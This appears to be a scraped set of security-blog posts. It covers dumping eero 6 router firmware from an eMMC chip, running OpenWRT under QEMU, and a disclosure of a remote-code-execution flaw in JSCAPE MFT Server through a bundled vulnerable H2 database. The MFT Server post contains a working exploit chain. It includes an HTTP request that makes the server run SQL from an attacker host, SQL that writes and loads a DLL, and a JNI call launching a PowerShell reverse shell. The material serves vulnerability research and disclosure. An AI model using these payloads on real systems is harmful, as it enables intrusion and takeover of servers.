proper interface, just pins.\nMKS eMMC adapter I could have soldered these pins to a regular microSD adapter, which I had already tried. However, I did not want to go down that route again, so I decided to buy a device to talk to the eMMC chip, which in turn talks to my system.\nThe MKS eMMC adapter device is typically used in 3D printers for upgrading firmware.
It supports both a microSD slot and a 20-pin eMMC extension module header with a USB 3.0 interface.\nYou can find them almost anywhere: eBay, Amazon, Aliexpress, etc.\nPutting it together Identifying pinout Annoyingly, I couldn\u0026rsquo;t find a pinout table for the BGA153 adapter showing what each pin is connected to. I guess it\u0026rsquo;s because the adapter is mostly used with devices such as the RT809H or TL866, where you just plug it in and let the software handle the rest.\nTo start, I had to get a datasheet for the Kingston BGA153 eMMC chip, and then compare it with the layout on the adapter. Nothing too difficult here, although I did need to order some very fine multimeter probes.\nThe middle square of pins is for the flash I/O and memory power supply, and the outer square of pins is for the memory controller core and MMC I/O, as well as their power supply. The flash memory uses Vcc and Vss, while the memory controller uses Vccq and Vssq.\nI needed to unscrew the top plastic piece so I could easily reach the pads on the PCB with my multimeter probes. I then set it to continuity mode and touched each pin until I heard a beep, while comparing with the above chip pinout.\nHere is the pinout for those that are interested:\nAs you can see in the left part of the image, the pins match up exactly to the ones from the eMMC flash reference document. I was confident that this should work, but there\u0026rsquo;s always room for error.\nNote: Trying to read the eMMC using 1-bit mode (DAT0 only) did NOT work for me.\nTo communicate with the chip, the following pins must be connected: the command and clock pins CMD and CLK; the data pins DAT0, DAT1, DAT2, and DAT3; the power pins Vcc and Vccq; and the ground pins Vss and Vssq. This allowed me to read and write to the eMMC in 4-bit transfer mode.\nSoldering jumper wires As mentioned above, I found a cheap MKS EMMC Adapter device for about £5 on eBay.
It supports both a microSD slot and a 20-pin eMMC extension module, and uses a USB 3.0 interface. All I needed to do was solder the wires to the eMMC module pins.\nThe 20-pin layout for the eMMC module was found here:\nPin# Assignment Pin# Assignment\n1 EMMC_D0 2 EMMC_D1\n3 EMMC_D2 4 EMMC_D3\n5 EMMC_D4 6 EMMC_D5\n7 EMMC_D6 8 EMMC_D7\n9 EMMC_STRB 10 GND\n11 EMMC_CMD 12 EMMC_CLK\n13 N/C 14 GND\n15 N/C 16 VCC_IO\n17 eMMC_RST 18 VCC3V3\n19 GND 20 GND\nHere\u0026rsquo;s the ugly but finished product. Note: The pins are numbered, but the numbers are not visible in the following photo. It would\u0026rsquo;ve been nice if there was a breakout slot.\nNow all I needed to do was solder the wires to the BGA153 adapter.\nReading the chip Here\u0026rsquo;s a photo of everything connected and what it actually looked like.\nThe BGA153 adapter (with the eMMC chip inside) is connected to the MKS EMMC Adapter using jumper wires. That is then connected to my main system running Windows with VMware, where I have a dedicated Linux virtual machine for embedded device work. Once plugged in, I just needed to pass the USB device through to the VM.\nI used dmesg with -W to monitor changes.
It was at this point where I got super excited.\nnaz@looper:~$ sudo dmesg -W [sudo] password for naz: [ 1880.570293] usb 3-2: new high-speed USB device number 5 using xhci_hcd [ 1880.948845] usb 3-2: New USB device found, idVendor=05e3, idProduct=0747, bcdDevice= 8.19 [ 1880.948853] usb 3-2: New USB device strings: Mfr=3, Product=4, SerialNumber=5 [ 1880.948856] usb 3-2: Product: USB Storage [ 1880.948858] usb 3-2: Manufacturer: Generic [ 1880.948861] usb 3-2: SerialNumber: 000000000819 [ 1880.977681] usb-storage 3-2:1.0: USB Mass Storage device detected [ 1880.981082] scsi host33: usb-storage 3-2:1.0 [ 1880.981818] usbcore: registered new interface driver usb-storage [ 1880.986104] usbcore: registered new interface driver uas [ 1882.006464] scsi 33:0:0:0: Direct-Access Generic STORAGE DEVICE 0819 PQ: 0 ANSI: 6 [ 1882.007017] sd 33:0:0:0: Attached scsi generic sg2 type 0 [ 1882.258668] sd 33:0:0:0: [sdb] 7471104 512-byte logical blocks: (3.83 GB/3.56 GiB) [ 1882.261570] sd 33:0:0:0: [sdb] Write Protect is off [ 1882.261575] sd 33:0:0:0: [sdb] Mode Sense: 87 00 00 00 [ 1882.264699] sd 33:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn\u0026#39;t support DPO or FUA [ 1882.284287] sd 33:0:0:0: [sdb] Attached SCSI removable disk A new disk called sdb showed up with a capacity of 4GB. I knew this was a good sign, as the Kingston eMMC chip specification matched up. But also that it didn\u0026rsquo;t automatically disconnect like my previous attempts. I quickly moved onto dumping the actual firmware.\nDumping firmware As soon as the sdb disk was visible I wasted no time in creating a raw dump copy of the firmware. A common utility like dd should do the trick. To dump the contents of a disk to a file you can use the following command:\nsudo dd if=/dev/sdb of=emmc_eer6.bin status=progress bs=16M A screenshot of the actual command being run, which shows a transfer speed of 27MB/s. 
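Raw reads over hand-soldered jumper wires can silently flip bits, so before analysing anything it is worth dumping the chip twice and comparing checksums. A small helper that hashes a multi-gigabyte image without loading it into memory (the filenames in the comment are only an example):

```python
import hashlib


def file_sha256(path: str, chunk_size: int = 1 << 20) -> str:
    """Return the SHA-256 hex digest of a file, read in 1 MiB chunks."""
    sha = hashlib.sha256()
    with open(path, "rb") as f:
        while block := f.read(chunk_size):
            sha.update(block)
    return sha.hexdigest()


# Example: dump the eMMC twice, then check that
# file_sha256("emmc_eero6.bin") == file_sha256("emmc_eero6_2nd.bin")
```

If the two digests differ, re-check the CMD/CLK/DAT solder joints before trusting either dump.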
I also used 7z l emmc_eero6.bin to see if I could identify logical partition names.\nExtracting filesystem In total there were 23 logical partitions. To extract the .img files I used the command 7z x emmc_eero6.bin in the current working directory. I then mounted them all with this simple bash loop, run as root, which creates a directory per image and mounts it:\nfor i in *.img; do NAME=$(basename \u0026#34;$i\u0026#34; .img); mkdir \u0026#34;$NAME\u0026#34;; mount \u0026#34;$i\u0026#34; \u0026#34;$NAME\u0026#34;; done\nThe output will show multiple disks when using a graphical interface like Ubuntu.\nAnalysing filesystem I won\u0026rsquo;t go into great detail in this blog post, but I will share some general information about the partitions I found interesting. Also keep in mind that the firmware version installed before the eMMC was desoldered was v7.1.1-16.\nrootfs a compiled Python package called nodelib, which is used for device management and system operations. This was found in the /usr/lib/python3.10/site-packages/nodelib/ folder, along with other custom binaries.\nrootfs_1 a second root filesystem containing the same nodelib package, but with a different Python version; this one wasn\u0026rsquo;t compiled and was fully readable. It was found in the /usr/lib/python3.8/site-packages/nodelib/ folder.\nlog debugging and other messages, including a firmware download URL that had failed. Firmware archives require an authentication header, e.g.
https://cloudfront.eeroupdate.com/builds/v7.1.1-16%2B2023-12-13.prod.andytowngateway.tar.gz shows an error.\ncache a few private and public certificate files, which are presumably used to communicate with the backend cloud services, as well as the mobile app.\nbootconfig Qualcomm firmware and other stuff.\nSystemd services A few services which are started during device boot up.\n/lib/udev/rules.d/10-qca.rules /lib/systemd/libsystemd-shared-250.so /lib/systemd/system/core-comms.service /lib/systemd/system/homekit_adk.service /lib/systemd/system/homekit-dnsmasq.service /lib/systemd/system/captive-portal-main-dnsmasq.service /lib/systemd/system/sd-unit-analytics.service /lib/systemd/system/cache-mount.service /lib/systemd/system/pppd.service /lib/systemd/system/asset-manager.service /lib/systemd/system/radvd.service.d/10-eero.conf /lib/systemd/system/ace-messaging.service /lib/systemd/system/smarthomed.service /lib/systemd/system/ebid.service /lib/systemd/system/lldp-poe-mgr.service /lib/systemd/system/ace-zigbee.service /lib/systemd/system/dhclient_v6@.service /lib/systemd/system/aicfd.service /lib/systemd/system/dhclient_v4@.service /lib/systemd/system/btmanagerd.service /lib/systemd/system/smart-cloud-app.service /lib/systemd/system/captive-portal-a-dnsmasq.service /lib/systemd/system/dnsmanager.service /lib/systemd/system/ace-eventmgr.service /lib/systemd/system/thermald.service /lib/systemd/system/thermalmonitor.service /lib/systemd/system/bookshelf.service /lib/systemd/system/cnss_diag.service /lib/systemd/system/ffs-provisioner.service /lib/systemd/system/ec-dnsmasq.service /lib/systemd/system/captive-portal-guest-dnsmasq.service /lib/systemd/system/client-reporter.service /lib/systemd/system/captive-portal-b-dnsmasq.service /lib/systemd/system/noded.service /lib/systemd/system/wpa_supplicant@.service /lib/systemd/system/cache-status.service /lib/systemd/system/pushbutton-monitor.service /lib/systemd/system-shutdown/check_cache_discard /usr/lib A few libraries 
that are used with other binaries.
/usr/lib/libAicfIPCPrimitiveUtils.so /usr/lib/acs-lib/libace_ffs_provisioner.so /usr/lib/acs-lib/libace_connectivity_manager.so /usr/lib/acs-lib/libace_map.so /usr/lib/acs-lib/libCHIP.so /usr/lib/acs-lib/libwebsockets.so /usr/lib/acs-lib/libacehal_kv_storage.so /usr/lib/acs-lib/libace_minerva_metrics_api.so /usr/lib/acs-lib/libacehal_device_info.so /usr/lib/acs-lib/libace_tlscfg.so /usr/lib/acs-lib/libace_messaging.so /usr/lib/acs-lib/libwhisperjoin_dss_clientc_sdk.so /usr/lib/acs-lib/libffs_dssclient_sdk.so /usr/lib/libAicfAuthZC.so /usr/lib/libAicfUtils.so /usr/lib/libSmartHomeZigbeeAdapter.so /usr/lib/libSDKComponent.so /usr/lib/libSmartHomeUtils.so /usr/lib/libeero_system.so /usr/lib/libacsdkAssetsMocks.so /usr/lib/libicudata.so.70.1 /usr/lib/libNpbSerializer.so /usr/lib/libacsdkAuthorization.so /usr/lib/libAicfNativeAlexaComm.so /usr/lib/libacsdkDavsClient.so /usr/lib/libDAVSUtils.so /usr/lib/libacsdkAicfCA.so /usr/lib/sqm/eeroos.qos /usr/lib/libCapabilityLibrary.so /usr/lib/libAicfV3Helper.so /usr/lib/libAmazonAccountUtils.so /usr/lib/libPuffinUtils.so /usr/lib/libSmartHomeCHRSSYNC.so /usr/lib/libassetmgrd_client.so /usr/lib/libPuffinCommon.so /usr/bin A few binaries that are not part of the default operating system.
/usr/bin/ace_messaging_service /usr/bin/AicfD /usr/bin/smarthome_utility_puffin /usr/bin/SmartCloudApp /usr/bin/assetmgrd /usr/bin/ebid /usr/bin/noded /usr/bin/SmartHomed /usr/bin/qorvo-ble-setup-service Conclusion I know readers might say, oh you cheated by going to a phone repair shop to desolder the eMMC chip. While that may be true, it still didn't stop me from running into issues with actually reading data off the chip.
In this blog post I share some of the issues and solutions I ran into while trying to extract data from an eMMC chip. It's a shame I couldn't find an easy way to root the device.
And the destructive technique of desoldering chips means that I'm left with a completely dead device, well, unless I re-solder the chip back on. But there might be a way in the future.
Why no firmware? While this has been a fun and interesting project, I will not be releasing any firmware files. I'm a hobbyist and do not wish to be sued by Amazon or Qualcomm for releasing proprietary content.
What's next? The next step is to analyse the firmware in more detail to find any security vulnerabilities, either in their applications or in the device itself, that are worth reporting for a possible bug bounty, as they do have a program on HackerOne.
Resources A list of great resources that I found really useful.
Hardware Hacking 101: Identifying and Dumping eMMC flash Hacking Hardware With a $10 SD Card Reader How to Dead-Bug a BGA Flash Memory chip A detailed description of eMMC technology Flash readers by Voidstarsec ","permalink":"https://markuta.com/eero-6-hacking-part-2/","title":"Hacking Amazon's eero 6 (part 2)"},{"categories":null,"contents":"Overview A short blog on how to install and run the latest version of OpenWRT using QEMU, on a machine with an Apple M1. This is similar to my previous blog post on How to build a Debian MIPS image on QEMU.
This guide uses the OpenWRT ARMv8 edition, which runs nicely on an Apple M1 chip. It also covers how to install the LuCI web management interface.
Download and Install Select and download the necessary files from the link below. I will be using OpenWRT version 23.05.3 based on ARMv8. These can be found on the official website here.
You only need the following files:
generic-initramfs-kernel.bin (for recovery mode) openwrt-armsr-armv8-generic-squashfs-combined.img u-boot.bin (found here) Also make sure the qemu software is actually installed.
On macOS systems, you could use brew install qemu; this installs emulators for various systems (not all of them necessary). For example, my machine supports:
qemu-system-aarch64 qemu-system-hppa qemu-system-microblazeel qemu-system-nios2 qemu-system-riscv64 qemu-system-sparc qemu-system-alpha qemu-system-i386 qemu-system-mips qemu-system-or1k qemu-system-rx qemu-system-sparc64 qemu-system-arm qemu-system-loongarch64 qemu-system-mips64 qemu-system-ppc qemu-system-s390x qemu-system-tricore qemu-system-avr qemu-system-m68k qemu-system-mips64el qemu-system-ppc64 qemu-system-sh4 qemu-system-x86_64 qemu-system-cris qemu-system-microblaze qemu-system-mipsel qemu-system-riscv32 qemu-system-sh4eb qemu-system-xtensa qemu-system-xtensaeb This guide uses qemu-system-aarch64, which supports ARMv8 CPUs.
QEMU Run the following command inside the folder where both u-boot.bin and openwrt-armsr-armv8... are located. This will start the emulator and begin the initial boot process.
qemu-system-aarch64 -cpu cortex-a72 -m 1024 -M virt,highmem=off -nographic \
  -bios u-boot.bin \
  -drive file=openwrt-armsr-armv8-generic-squashfs-combined.img,format=raw,if=virtio \
  -device virtio-net,netdev=net0 -netdev user,id=net0,net=192.168.1.0/24,hostfwd=tcp:127.0.0.1:1122-192.168.1.1:22,hostfwd=tcp:127.0.0.1:8080-192.168.1.1:80 \
  -device virtio-net,netdev=net1 -netdev user,id=net1,net=192.168.2.0/24
The options are explained below:
-cpu cortex-a72 use a specific ARM CPU type
-m 1024 use 1GB of RAM
-M virt,highmem=off type of machine
-nographic no window (use the terminal)
-bios u-boot.bin use the bootloader file
-drive file=... use the .img file as the disk drive
-device virtio-net,netdev=net0 set up a network device
net=192.168.1.0/24 set the network address range
hostfwd=tcp:127.0.0.1:1122-192.168.1.1:22 enable host port forwarding, e.g. for SSH
When you run this command, you should be presented with a shell in your terminal.
If you do not see any output, you can try appending -serial stdio to route the serial console to standard I/O.
Here is an example of what you should see:
Press [ENTER] to use the shell.
Web interface The default installation of OpenWRT does NOT come with a web interface. To get that installed, you can use the working command-line interface to update the package cache, and then install it. I will be using the LuCI package.
While logged in to the shell, type:
opkg update
opkg install luci
You'll notice a new process called uhttpd is now running on port 80.
root@OpenWrt:~# netstat -tupan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 2206/dnsmasq
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1370/dropbear
tcp 0 0 192.0.2.15:53 0.0.0.0:* LISTEN 2206/dnsmasq
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 6805/uhttpd
This is the web management service.
Note: To avoid exposing all interfaces, you can forward to localhost only (the host machine). For example, hostfwd=tcp:127.0.0.1:1122-192.168.1.1:22,hostfwd=tcp:127.0.0.1:8080-192.168.1.1:80 forwards two ports to a specific VM IP address and port. I can then access each service on the forwarded port, e.g. ssh root@localhost -p 1122.
Here's an example of the OpenWRT LuCI web interface from the host system:
Notice the model linux,dummy-virt, indicating that it's not running on real hardware.
Recovery mode To enter OpenWRT recovery mode you have to append -kernel along with the initramfs file to the qemu command. In this mode, the file system will be mounted as read-only.
Here is a complete example:
qemu-system-aarch64 -cpu cortex-a72 -m 1024 -M virt,highmem=off -nographic \
  -bios u-boot.bin \
  -kernel openwrt-armsr-armv8-generic-initramfs-kernel.bin \
  -drive file=openwrt-armsr-armv8-generic-squashfs-combined.img,format=raw,if=virtio \
  -device virtio-net,netdev=net0 -netdev user,id=net0,net=192.168.1.0/24,hostfwd=tcp:127.0.0.1:1122-192.168.1.1:22,hostfwd=tcp:127.0.0.1:8080-192.168.1.1:80 \
  -device virtio-net,netdev=net1 -netdev user,id=net1,net=192.168.2.0/24
Bonus A really nice feature of qemu is that you can attach a gdb debugger and step through a process. This is extremely useful for identifying difficult bugs and for exploit development.
These options are:
-S freeze the CPU at startup (use 'c' in the debugger to start execution)
-s shorthand for -gdb tcp::1234 (start a gdb server on TCP port 1234)
For example, a screenshot from another project where I had an x86 VM running on my M1 system, which I attached to using lldb with the option gdb-remote localhost:1234:
","permalink":"https://markuta.com/openwrt-qemu-m1/","title":"How to install OpenWRT on QEMU"},{"categories":null,"contents":"Update: Fixed proof of concept link. Background This research project started back in July 2023, at around the same time a critical vulnerability in a popular file-sharing software called MoveIt Transfer was disclosed. More details about that particular vulnerability can be found here and here.
I was curious and looked for other similar file-sharing software with security issues. And so a few Google searches later, I found a candidate: an enterprise product called MFT Server by JSCAPE. I downloaded a trial version and began initial testing.
What is it? JSCAPE MFT Server is a paid-for enterprise file-sharing solution that supports most major platforms.
It can handle multiple communication protocols, such as AS2, FTP/S, SFTP, HTTP/S, WebDAV, cloud storage, and more.
A screenshot of a few customers listed on their website.
A free 7-day demo is available at this link (requires an email for a license).
Installing Server I opted to install the 64-bit Windows version on my virtual machine. I won't bore you with the installation process, but the installer comes with a standalone Java environment, which means we don't have to install any additional dependencies, which is nice.
I would like to point out the "Server Access Settings" step, which lets users configure a management IP address on default port 10880 and the REST API on port 11880, as well as the admin user credentials. This was left at the defaults.
For evaluation copies, the default option for the Database settings is an embedded database type. But there's also a database URL parameter where you could choose other databases via a JDBC URL, which is greyed out. This can be seen in the following screenshot:
After supplying the temporary license file, the setup process is complete. A new Windows service called MFT Server will be created, configured to start automatically after a system reboot.
Web Management When the installation process is finished, a web management interface is accessible from either 127.0.0.1 or a local IP address, e.g. 192.168.153.129 (the external IP set during installation), on port 11880. You have to specify the admin credentials.
Datastore feature Whilst browsing through the management interface and looking for interesting features, I stumbled across the Datastore feature, which can be found in Settings > Datastore. As the name implies, it's meant for database management.
The screenshot below shows we are able to configure the fields JDBC URL, Username, Password, Pool, Pool Timeout, and Synchronize data every.
When you press the Test Parameters button a window appears saying the database test has passed, with a few tick marks and nothing else. To learn more about this HTTP request, I set up a BurpSuite proxy to capture and review it more closely.
The HTTP POST request is sent to the path /2/rest/management/datastore/test along with a JSON body containing the chosen parameters and values. The url field supplies the actual JDBC URL that we're interested in.
To understand what the jdbc:h2 part meant, I did a bit of research.
H2 Database H2 Database is a fast, open-source database engine used in Java applications. There have been at least two critical vulnerabilities, in versions 1.4.199 and 2.1.210, which enable attackers to execute commands using external SQL input.
Reviewing the files and folders of the MFT Server software, I was able to confirm the presence of this library, which turned out to also be a vulnerable version. This is when I got really excited.
The vulnerable library was located in (Windows):
The library at C:\Program Files\MFT Server\libs\h2\h2-1.4.199.jar was bundled in versions mft-server-install-x64-2023.2.2.503 and earlier. You can read about the H2 vulnerability here, with a proof of concept available here.
Exploiting the vulnerability As a quick smoke test, I set up a simple python web server python3 -m http.server that served a test.sql file. This file contains a payload that should execute a command on the system using Runtime.getRuntime().exec(cmd) to open the Windows calculator.
The contents of test.sql were:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}'; CALL EXEC ('/?
&& calc'); I then sent the following HTTP POST request, with a custom url value:
POST /2/rest/management/datastore/test HTTP/1.1
Host: 192.168.159.130:11880
Content-Type: application/json
Cookie: JSESSIONID_11880=node01cu13vvfy01hqqy0kd7y49d3k17.node0;
Connection: close

{
"url":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.159.135:8000/test.sql'",
"username":"server",
"password":null,
"connectionPoolSize":100,
"idleConnectionTtlMillis":10000,
"synchronizationPeriodMillis":null
}
The python HTTP server request logs:
Yes! Although the command doesn't execute calc.exe on the target system, we can confirm the server sends a request back to the attacker and tries to parse the SQL query.
The error CreateProcess error=2, The system cannot find the file specified indicates the reason might be related to javac, and the fact that I don't have Java installed on my Windows system, since I'm using the standalone Java environment provided by the JSCAPE MFT Server software.
I then tried to find other ways of exploiting this vulnerability.
Getting RCE I read an excellent blog post by Markus Wulftange. He demonstrated how to exploit a vulnerable H2 database by using the Java Native Interface (JNI) to achieve remote command execution. You should definitely have a read, as this blog post is largely based on his work.
At a high level, the attack has three stages: run a SQL query to write a valid DLL file to the system, use another SQL query to load the DLL into the target MFT Server process, and finally use the Java Native Interface (JNI) through the loaded library to execute commands on the system.
Writing to file system To start off, we need to be able to write to the file system in order to plant a DLL we can load.
From the blog post above, a function called CSVWRITE() was used to write to the file system. Here is the example:
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),...,'"'), 'ISO-8859-1', '', '', '', '', '');
However, during my initial testing I could not get this function to write to the system properly; I would always get an error.
I then went on the official H2 website to try to find an alternative to CSVWRITE(). I identified a function called FILE_WRITE(), which, as the name suggests, writes to a file. Markus's blog also mentions this function but for some reason I skipped over it.
The website describes the FILE_WRITE() usage:
FILE_WRITE ( blobValue , fileNameString ) Write the supplied parameter into a file. Return the number of bytes written. Write access to the folder, and admin rights, are required to execute this command. Example: SELECT FILE_WRITE('Hello world', '/tmp/hello.txt') LEN;
This could be a perfect alternative.
The usage example writes a simple plaintext value to a text file, but we want to write a DLL file instead, which contains all sorts of weird characters. I initially tested using CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),...,'"') but that failed.
I was stuck for a bit, but after some more Googling I found out you can use an X before the quotes to indicate a hexadecimal input value. Here is an example:
-- Write file to system
CALL FILE_WRITE(X'4d5a900003...','C:\\Program Files\\MFT Server\\JNIScriptEngine.dll');
With this I was able to convert a DLL into hex and write it to the file system, perfect!
Also notice the file permissions: only administrators and system users can modify it.
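Building that X'…' literal just means flattening the DLL into one continuous hex string. One way to do this on a Linux attacker box (a sketch: sample.bin stands in for the real DLL bytes, and xxd is assumed to be installed; the target path matches the one used above):

```shell
# Stand-in for the DLL: the first four bytes of a PE header (MZ 90 00),
# written with portable octal escapes.
printf '\115\132\220\000' > sample.bin

# Flatten the binary into a single hex string (xxd -p wraps lines, so
# strip the newlines), then wrap it in the FILE_WRITE call. Note the
# doubled backslashes the SQL string expects.
HEX=$(xxd -p sample.bin | tr -d '\n')
printf "%s\n" "CALL FILE_WRITE(X'${HEX}','C:\\\\Program Files\\\\MFT Server\\\\JNIScriptEngine.dll');" > write_dll.sql

cat write_dll.sql
# CALL FILE_WRITE(X'4d5a9000','C:\\Program Files\\MFT Server\\JNIScriptEngine.dll');
```

With a real DLL the resulting statement is several megabytes of hex, which is why sending it as its own request (or SQL file) matters.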
The file is locked down like this because MFT Server runs as the SYSTEM user, and the written file inherits the same permissions.
Loading native library The next step is to load the library we just created. This can be done with two commands: 1) create a reference to the static public method java.lang.System.load, and 2) load the DLL file with the System_load() function. Here is an example:
-- Loading library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\\Program Files\\MFT Server\\JNIScriptEngine.dll');
To confirm the library is loaded, we can inspect the server.exe process memory using ProcessHacker. As shown below, a handle to JNIScriptEngine can be found at 0x7ff9bcf20000 (different on each reboot).
Running commands Finally, we create an alias for JNIScriptEngine.eval to evaluate and then execute a command on the system. For example, the following shows how you would execute an encoded PowerShell command (full command not included) to get a remote shell:
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
-- Run command e.g. PowerShell reverse shell on 192.168.159.135:4444 base64 encoded UTF-16LE
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("powershell.exe -enc JABjAGwAaQBl...dAAgAD0AZQAoACkA").getInputStream()).useDelimiter("\\Z").next()');
This took a few tries but I was finally able to get a SYSTEM shell on our Kali listener:
This was done over several HTTP requests; otherwise the SQL query might overwrite the already written DLL. I opted to comment out each step after sending a request. You could also use separate SQL files.
Disclosure by Rapid7 In September 2023, Rapid7 identified a separate vulnerability in JSCAPE MFT Server, which is tracked as CVE-2023-4528.
This vulnerability is also related to an insecure Java deserialisation bug, but within an XML parser instead of the H2 library. It too allows authenticated attackers to gain remote code execution.
The fix applied by the JSCAPE developers introduced a few changes which made it harder for my initial exploit to achieve RCE. For example, I was no longer able to run:
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("calc").getInputStream()).useDelimiter("\\Z").next()');
I would get a new error:
The error with code 90105 is thrown when an exception occurs in a user-defined method. Nevertheless, it still may be possible to execute arbitrary code, because we are able to write to any location as the SYSTEM user, which is very powerful. An attacker could replace a certain DLL with a malicious one and wait for a reboot for it to execute.
Proof of Concept Note: You have to separate each stage of the proof of concept into its own HTTP request, to avoid overwriting the DLL or loading it into the process prematurely.
The proof of concept poc.sql has three parts:
Write the DLL to the system. Load the DLL into the MFT Server server.exe process memory. Call the JNI function and execute commands on the system. MFT Server version 2023.3.1.513 was tested on Windows 10 x64 and confirmed to be vulnerable. But other versions may also be affected.
For example, the following shows the SQL commands CALL FILE_WRITE() and CALL System_load() that attempt to write a file to disk and then load it into memory.
2023-10-15 14:10:05 database: connecting session #3 to mem:testdb
2023-10-15 14:10:05 jdbc[3]: /*SQL */SET TRACE_LEVEL_SYSTEM_OUT 3;
2023-10-15 14:10:05 jdbc[3]: /*SQL #:1*/CALL FILE_WRITE(X'4d5a9000...000000','C:\\\\Program Files\\\\MFT Server\\\\JNIScriptEngine.dll');
...
2023-10-15 14:10:05 jdbc[3]: /*SQL #:1 t:24*/CALL System_load('C:\\\\Program Files\\\\MFT Server\\\\JNIScriptEngine.dll');
2023-10-15 14:10:05 jdbc[3]: /*SQL */;
2023-10-15 14:10:05 jdbc[3]: /*SQL #:4 t:46*/RUNSCRIPT FROM 'http://192.168.153.136/poc.sql';
...
Applying for a CVE I tried to apply for a CVE, but after waiting 2 months I received a response from mitre.org indicating that a CVE would not be registered, because the bug is in an out-of-date library that the software uses, which already has CVEs registered. I was a bit disappointed, but it does make sense.
From: cve-request@mitre.org Please use CVE-2022-23221 or CVE-2021-42392 to refer to this JSCAPE MFT Server vulnerability. We cannot provide separate CVE IDs for every product that ships with an outdated, vulnerable copy of H2 Database. ... Resources Exploiting H2 Database with native libraries and JNI Chaining Vulnerabilities in H2 Database for RCE Timeline Note: The long gap between June and October was mostly me trying to find auth-bypass-type bugs, since this vulnerability required administrator credentials to be exploitable.
But also other things getting in the way like life and work.\n22/06/2023: Discovered JDBC vulnerability via H2 library 27/06/2023: Testing for other auth bypass vulnerabilities 15/10/2023: Submitted a request to register a CVE on MITRE 21/10/2023: Retested new version release 10/12/2023: Response from MITRE of CVE not being registered 01/01/2024: Contact Rapid7 to help with disclosure 02/02/2024: First contact attempt with vendor (Redwood) 07/02/2024: Second contact attempt with vendor 28/02/2024: Third contact attempt with vendor 29/02/2024: Response from vendor (team working on this issue) 14/03/2024: Contact vendor asking for fix confirmation (no response) 22/03/2024: Published this blog ","permalink":"https://markuta.com/jscape-mft-server-rce/","title":"Exploiting a JDBC deserialization vulnerability in MFT Server by JSCAPE"},{"categories":null,"contents":"This is the first in the series of hacking Amazon\u0026rsquo;s eero 6 (3rd generation) Wi-Fi device. In this post I will be focusing on device disassembly, identifying pins, brute forcing JTAG, and reading serial output.\nThe second part of the blog can be found: https://markuta.com/eero-6-hacking-part-2/\nAbout Eero is a San Francisco-based wireless Internet company founded in 2015. It is known for making household consumer Wi-Fi products. The company was acquired by Amazon in 2019 for $97 million.\nDevice Specification eero 6 (3rd gen 2020) device specification. The table below is based on data from evanmccann.net, which includes a nice table that compares other eero devices.\nType Value CPU speed 1.2GHz x 4 CPU type Cortex-A53 (Qualcomm IPQ6000) RAM 512MB Storage 4GB Flash (Kingston EMMC04G-M627) Generation Gen 3 Release 2020 WiFi class AX1800 (WiFi 6) Type Extender/Gateway Radios 2 (2.4GHz and 5GHz) BlueTooth 5.0 ZigBee Yes Power 15W (via USB type-C) FCC documents Before purchasing a device on eBay, I first did a bit of research to find out whether there were any internal device photos available. 
I was mainly interested in anything resembling debug interfaces and chip part numbers. As it turns out, the Federal Communications Commission (FCC) published several documents for different eero products. These were typically engineering samples but proved to be extremely useful.
The documents (mirror available here) don't have high resolution photos, which makes reading most chip markings difficult, but they did have a few photos of interesting pins. Here's a photo that immediately piqued my interest.
The 5 by 2 pins look a lot like a 10-pin ARM JTAG interface.
I also noticed 3 pins on the top side of the PCB, which looked like a serial interface.
Disassembly The device itself was surprisingly easy to disassemble. To start off, you need to remove the manufacturer sticker located on the bottom of the device. This reveals a single T4? screw as shown in the photo below.
You then need to pry open the two plastic pieces; I used a thin piece of plastic (an expired gift card) so as not to damage internal components or the case itself. You will then see three T4 screws attached to the thick aluminum base.
Flip the device over and remove four more screws.
You will notice there are two main boards, connected by a 34-pin GPIO interface: one board with two Ethernet ports for networking and a single USB type-C port for power (15W), and the other board with the SoC, NAND, and other RF components.
The following shows the underside of the board (the one with the RF components).
And here's a view from the top with one of the RF shields removed, revealing the CPU, RAM and NAND chips:
Identifying pins I quickly checked whether the same pins from the FCC photos were also present on my device, which they were. The only difference (it would seem) was that my PCB was blue, while the other one was green.
It's likely the FCC device was an engineering version.
Soldering wires
I soldered each pin onto a mini solderable breadboard using 0.2mm copper wire that had a thin layer of enamel. This made it much easier to work with, as I could then attach it to a full-size breadboard and use standard jumper wires.
Before doing this I quickly checked for ground pins by putting my multimeter in continuity mode. I set my black probe on something I knew was ground, like an RF shield, and the red probe on each pin.
A loud beep confirmed pin 3 was ground.
Here's a photo of all the wires soldered onto a mini breadboard attached to my standard breadboard: And here's what it looked like with the two PCBs connected together, and wires protruding from underneath. I would later solder those 3 pins on the top (not seen in this photo):
Pin voltage After soldering the wires to the breadboard I turned the device on and let it run for a few seconds. Here is the voltage I recorded for each pin:
Pin Volts
1 - 1.8v
2 - 1.8v
3 - G
4 - 1.8v
5 - 0.5v
6 - 0.7v
7 - 0.4v
8 - 1.8v
9 - 1.8v
10 - 1.8v
Setting up Wiring The wiring and pin numbers may get confusing, especially with multiple coloured pins, devices, and different orientations.
I found it very useful to map out each pin in a small table and use it as a reference.
device | level shifter | Arduino | program
-------+---------------+----------+--------
1 -----| VA = VB |---- 3.3v |
2 -----| A1 = B1 |---- D2 | 1
3 ---- G | |
4 -----| A2 = B2 |---- D3 | 2
5 -----| A3 = B3 |---- D4 | 3
6 -----| A4 = B4 |---- D5 | 4
7 -----| A5 = B5 |---- D6 | 5
8 -----| A6 = B6 |---- D7 | 6
